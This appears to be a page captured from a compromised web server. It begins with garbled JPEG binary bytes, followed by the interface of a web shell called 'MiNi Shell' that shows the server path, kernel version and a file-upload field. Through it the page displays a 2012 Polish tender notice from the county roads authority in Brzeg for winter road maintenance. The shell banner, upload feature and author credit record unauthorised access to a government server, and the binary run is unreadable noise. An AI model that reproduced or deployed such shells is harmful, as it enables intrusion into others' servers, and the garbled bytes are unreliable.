JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121009/388842-N-2012.html

<p class="kh_header"><b>Brzeg: USŁUGI ZWIĄZANE  Z ZIMOWYM UTRZYMANIEM  DRÓG  POWIATOWYCH    
     W SEZONIE ZIMOWYM  2012/2013</b><br>
<b>Numer ogłoszenia: 388842 - 2012; data zamieszczenia: 09.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ZWIĄZANE  Z ZIMOWYM UTRZYMANIEM  DRÓG  POWIATOWYCH    
     W SEZONIE ZIMOWYM  2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia są usługi związane z zimowym utrzymaniem dróg powiatowych realizowane   
         będą na terenie gmin: miasto Brzeg, gmina Skarbimierz ,Gmina Lubsza, Gmina Olszanka,   
         Gmina i Miasto Grodków, Miasto i Gmina Lewin Brzeski  polegające na zwalczaniu   
         śliskości zimowej w technologii posypywania dróg mieszanką piaskowo-solną,   
         odśnieżaniu dróg oraz załadunku i pryzmowaniu materiału. Usługi będą realizowane przy   
         użyciu następujących środków  sprzętowo-transportowych :
         - nośniki wyposażone w urządzenia systemu monitorująco -kontrolującego - 5 szt 
         - piaskarko-solarki - 5 szt ,  w tym 2 szt nowe,
         - pługi  średnie, ciężkie - 7 szt , w tym 4 pługi dociskowe hydrauliczne,  
         - nośniki do pługów wyposażone w urządzenia systemu monitorująco- kontrolującego
            - 2 szt
          - ładowarka do odśnieżania - 1 szt
          - równiarka samojezdna do odśnieżania  - 1 szt
Drogi objęte zamówieniem winny być utrzymywane przez cały sezon zimowy 2012/2013 
          wg trzech kolejności i standardów odśnieżania i zwalczania śliskości opracowanych przez
          Zamawiającego i stanowiące załączniki do SIWZ .
 Zlecanie wykonania usług  podwykonawcom
          W przypadku awarii środków sprzętowo-transportowych podanych w ofercie Wykonawca
           zobowiązany jest zapewnić  środki zastępcze (np. wynajęte) tak, aby całkowita ilość        
           środków do dyspozycji Zamawiającego była zgodna z ilością podaną w ofercie.   
 Obowiązki i zadania Wykonawcy.
          Wykonawca przez cały okres ważności umowy gwarantuje oddanie do dyspozycji     
           Zamawiającego w celu wykonania usług zimowego utrzymania dróg  ilość środków       
           sprzętowo-transportowych zgodną z ilością zadeklarowaną w ofercie. Wykonawca winien   
           przez cały okres zimowy utrzymywać sprzęt w stanie sprawnym poprzez wykonywanie 
           napraw i obsług technicznych. Koszty napraw i obsług technicznych ponosi Wykonawca
           i wchodzą one w cenę jednostkową podaną w formularzu cenowym  i w ofercie. 
Wykonawca wyposaży na swój koszt  w ramach umowy na wykonanie usługi    
           zimowego utrzymania dróg powiatowych  jednostki sprzętowe w system  
           monitorująco -kontrolujący pracy sprzętu. System monitorowania pracy sprzętu   
           przy zimowym  utrzymaniu dróg powiatowych na terenie powiatu brzeskiego 
           powinien umożliwiać  odczyt  i analizę danych w zakresie lokalizacji pojazdu,    
           rodzaju wykonywanej pracy z prędkością z jaką porusza się pojazd. Odczyt    
           powinien  odbywać się czasie rzeczywistym przez przeglądarkę internetową. System 
           powinien umożliwić  bezpośredni kontakt dyżurnego z operatorem. Wykonawca 
           zobowiązany   do   przeszkolenia wyznaczonych pracowników Zarządu Dróg  
           Powiatowych w Brzegu do prowadzenia akcji zimowego utrzymania dróg w celu   
           pełnego wykorzystania  oprogramowania systemu .
           W razie utraty zasięgu system powinien zapewniać gromadzenie danych przez
           min. 5 godz. Po powrocie zasięgu urządzenie powinno natychmiast nawiązać    
           połączenie z serwerem i przesłać zaległe dane. 
           W przypadku  awarii systemu- czas reakcji i czas naprawy nie dłuższy niż 
           24  godziny.
Dla obsługi terenu gmin : miasto Brzeg, Skarbimierz, Lubsza i Olszanka 
           Wykonawca musi mieć do dyspozycji plac przygotowany do składowania materiału 
           stosowanego do zwalczania śliskości zimowej  (mieszanka piaskowo-solna) na terenie   
           bazy m. Brzeg.
           Zamawiający dostarczy Wykonawcy ilość materiałów niezbędną do prawidłowego   
           przebiegu akcji zimowej.
 Dla obsługi terenu gmin : Grodków i Lewin Brzeski Wykonawca musi mieć do 
           dyspozycji plac przygotowany do składowania materiału stosowanego do zwalczania 
           śliskości zimowej (mieszanka piaskowo-solna) na terenie gminy Grodków.
           Zamawiający dostarczy Wykonawcy ilość materiałów niezbędną do prawidłowego    
           przebiegu akcji zimowej.
Wykonawca oddaje do dyspozycji Zamawiającemu w celu wykonania usług związanych
           z zimowym utrzymaniem dróg środki sprzętowo-transportowe wraz z operatorem    
           (kierowcą)posiadającym kwalifikacje gwarantujące prawidłowe wykonanie usług.   
           Wykonawca zobowiązany jest do podstawienia środków sprzętowo-transportowych
            z materiałami pędnymi i mieszanką piaskowo-solną wraz  z obsługą wyposażoną
           w odzież ochronną zimową i posiłki regeneracyjne w miejscu określonym przez  
           Zamawiającego nie później niż w ciągu  1 godz. od otrzymania wezwania lub w terminie      
           wyznaczonym przez  Zarząd Dróg Powiatowych.
 Wykonawca zabezpiecza podwójną obsadę kierowców i maszynistów gwarantującą     
           całodobową prace. Ilość godzin pracy (praca, dyżur) jednej osoby-maksimum 12 godzin
           na dobę.         
 Wezwanie może być pisemne, ustne lub telefoniczne. Wykonawca w przypadku nasilenia
           niekorzystnych warunków atmosferycznych realizować będzie usługi przez 24 godziny 
           na dobę, a jest zobowiązany zapewnić łączność telefoniczną z operatorem (kierowcą).
Wykonawca zabezpieczy odpowiednie pomieszczenia socjalne dla dyżurnych, kierowców 
           i operatorów środków sprzętowo-transportowych wezwanych do realizacji usług (w tym 
           dyżurów) związanych z zimowym utrzymaniem dróg  oraz przeprowadzi szkolenie  dla 
           operatorów i kierowców środków  sprzętowo-transportowych w zakresie techniki obsługi   
           mechanizmów jednostek sprzętowych i transportowych przy zimowym utrzymaniu dróg  
           oraz BHP.
Wykonawca zapewni realizację usług poprzez wyznaczenie dwóch  osób pełniących
           funkcję koordynatora pracy nośników i  sprzętu  odpowiedzialnej za prawidłowe     
           prowadzenie robót zimowego utrzymania dróg objętych niniejszym zamówieniem.
Do obowiązków osoby odpowiedzialnej za ZUD z ramienia Wykonawcy należy:
           a/ zapewnienie podstawienia i rozpoczęcia pracy sprzętu w ciągu 1 godz. od wezwania 
              przez Zamawiającego,
           b/ kontrola pracy sprzętu i nośników,
           c/ w przypadku awarii sprzętu podstawienie zastępczego sprzętu z zamontowanymi     
              urządzeniami technicznymi o takich samych parametrach technicznych i ilością 
              zadeklarowaną w umowie,
           d/ uzgadniania z Zamawiającym zmian lub przerw w pracy przy robotach zimowego    
               utrzymania,
           e/ opracowania i uzgodnienia z Zamawiającym; harmonogramu pracy sprzętu
               i   samochodów z podaniem typu samochodu lub sprzętu, nr rejestracyjny samochodu,     
               nazwisko kierowcy i adres i nr telefonu zainstalowanego na samochodzie
           f) rozliczanie finansowe wynajętego sprzętu i nośników.       
Wykonawca będzie wystawiać faktury raz w miesiącu za usługi wykonane przy   
           odśnieżaniu i zwalczaniu   śliskości na drogach powiatowych w terminie do 30 każdego   
           miesiąca. 
Usługa będzie zamawiana  sukcesywnie  do wysokości   środków finansowych
            posiadanych przez Zarząd Dróg Powiatowych w Brzegu.  
Obowiązki Zamawiającego
W przypadku wystąpienia potrzeby Zamawiający przeprowadzi szkolenie dla operatorów
             i kierowców środków sprzętowo-transportowych w zakresie realizacji usług związanych 
             z zimowym utrzymaniem dróg .
            Ze strony Zamawiającego do wezwania Wykonawcy do podstawienia środków    
            sprzętowo--transportowych upoważniony jest Kierownik Zarządu Dróg Powiatowych, 
            Z-ca Kierownika  i Dyżurny Zarządu Dróg Powiatowych.
 Usługa będzie kontrolowana przez Kierownika Zarządu Dróg Powiatowych ,
            Zastępcę  Kierownika Zarządu Dróg Powiatowych i Dyżurnego Zarządu Dróg            
            Powiatowych.
 Kontrola będzie przeprowadzana na bieżąco poprzez ocenę stanu przejezdności dróg.   
            Zamawiający nie odbierze i nie zapłaci za wadliwe, źle wykonane zlecenie.
Ilość godzin pracy dyżuru jednostek sprzętowo-transportowych przy wykonywaniu usług
            związanych z zimowym utrzymaniem dróg oraz ilości wysypanego na drogę materiału   
            będą potwierdzane przez Dyżurnego Zarządu Dróg Powiatowych na kartach pracy   
            sprzętu(raportach).
            Oryginały dokumentów potwierdzających  ilość godzin pracy i dyżurów wraz
            z dokumentem potwierdzającym  rozchód soli drogowej i piasku przy realizacji usług   
            stanowić będą podstawę do wystawienia faktury.
Zamawiający wypłaci Wykonawcy należne kwoty w terminie 30 dni od daty otrzymania
            faktury.  
 Wynagrodzenie ustala się według cen jednostkowych  za 1 godz. pracy sprzętu i dyżur. 
            Ceny podane w formularzu cenowym i w ofercie nie ulegną zmianie w trakcie realizacji    
            zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy 
                         konsorcjum  łącznie) wykaże, że  posiada doświadczenie polegające 
                         na wykonaniu w okresie ostatnich  3 lat  ( 3 sezonów zimowych- 2009/2010,
                         2010/2011, 2011/2012),przed upływem terminu składania ofert, a jeżeli okres 
                         prowadzenia działalności jest krótszy - w tym okresie usługi z zakresu  
                         zimowego utrzymania dróg o łącznej wartości co najmniej 500 000,00 zł,   
                         (słownie: pięćset tysięcy złotych 00/100),
                     2) jeżeli wykonawca będzie wykazywał  poleganie na wiedzy i doświadczeniu 
                         innego podmiotu z art.26 ust.2b - to musi wykazać wykonanie usług
                         jak  w § 5.3.1. pkt.1  siwz. Wykonawca w takiej sytuacji zobowiązany 
                         jest przedstawić pisemne zobowiązanie tych podmiotów do służenia wiedzą
                         i doświadczeniem w realizacji zamówienia, na zasadzie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy                                    
                      konsorcjum łącznie) wykaże, że dysponuje lub będzie dysponował niżej 
                      wymienionymi w pełni sprawnymi jednostkami sprzętu i środkami transportu 
                      zapewniającymi  wykonywanie  zamówienia :         
                      - nośniki wyposażone w urządzenia systemu monitorująco -kontrolującego - 5 szt 
                      - piaskarko-solarki - 5 szt ,  w tym 2 szt nowe ,
                      - pługi  średnie, ciężkie - 7 szt , w tym 4 pługi dociskowe hydrauliczne,  
                      - nośniki do pługów wyposażone w urządzenia systemu monitorująco -
                        kontrolującego - 2 szt
                      - ładowarka do odśnieżania - 1 szt  
                      - równiarka samojezdna do odśnieżania    - 1 szt
          - dysponuje lub będzie dysponował 2 (dwoma)  placami magazynowymi: 
            jeden na terenie gminy Brzeg,  drugi na terenie gminy Grodków lub posiada 
            pisemne zobowiązanie innego podmiotu do udostępnienia ww. jednostek 
            sprzętu , placu  na okres korzystania z nich przy wykonywaniu zamówienia 
            na zasadzie spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje
              lub będzie dysponował  odpowiednio wykwalifikowanymi i doświadczonymi 
              pracownikami - wykonawca ma do dyspozycji pracowników posiadających 
              niezbędne doświadczenie w zakresie zimowego utrzymania dróg, którzy    
              pracowali minimum w 2 ostatnich sezonach zimowych 2010/11, 2011/12)
              wymagane jest 2 koordynatorów oraz podwójna obsada kierowców, operatorów
              do obsługi i pracy sprzętu podanego w § 5.3.2 siwz, lub posiada pisemne zobowiązanie 
              innego podmiotu do udostępnienia ww. osób na okres korzystania z nich przy 
              wykonywania zamówienia na zasadzie  spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że znajduje 
                           się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
                           zamówienia przez przedłożenie informacji banku lub  spółdzielczej kasy
                           oszczędnościowo-kredytowej , w których Wykonawca posiada rachunek, 
                           potwierdzającej wysokość posiadanych środków finansowych lub zdolność
                           kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed
                           upływem terminu składania ofert  minimum posiadanych środków 
                          finansowych lub zdolność kredytową w wysokości  250 000,00 PLN,
                          (dwieście pięćdziesiąt tysięcy złotych)na zasadzie spełnia /nie spełnia,
                       2)jeżeli wykonawca polega na zdolności finansowej innego podmiotu
                          na zasadzie podanej w art.26 ust.2b ustawy Pzp należy przedłożyć 
                          informację, której mowa w § 5.3.4. pkt.1 siwz dotyczącej tego podmiotu, 

                      W przypadku składania oferty przez wykonawców ubiegających się wspólnie
                      o udzielenie zamówienia, ww. warunki wymienione  mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) OFERTA - wg załączonego wzoru do wypełnienia - zał. nr 1,
         2) FORMULARZ CENOWY  - wg załączonego wzoru do wypełnienia- zał. nr 2,
3) zaakceptowany WZÓR  UMOWY - zał. nr 3, 
         4) pełnomocnictwo do podpisywania oferty/reprezentacji o ile prawo do podpisywania, 
            reprezentacji nie wynika z innych dokumentów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany przez władzę ustawodawczą określonej  procentowej stawki podatku VAT ,    
   kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio  dostosowana</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu, 49-305 Brzeg,ul.Wyszyńskiego 23 p.nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu, 49-305 Brzeg,ul.Wyszyńskiego 23 p.nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com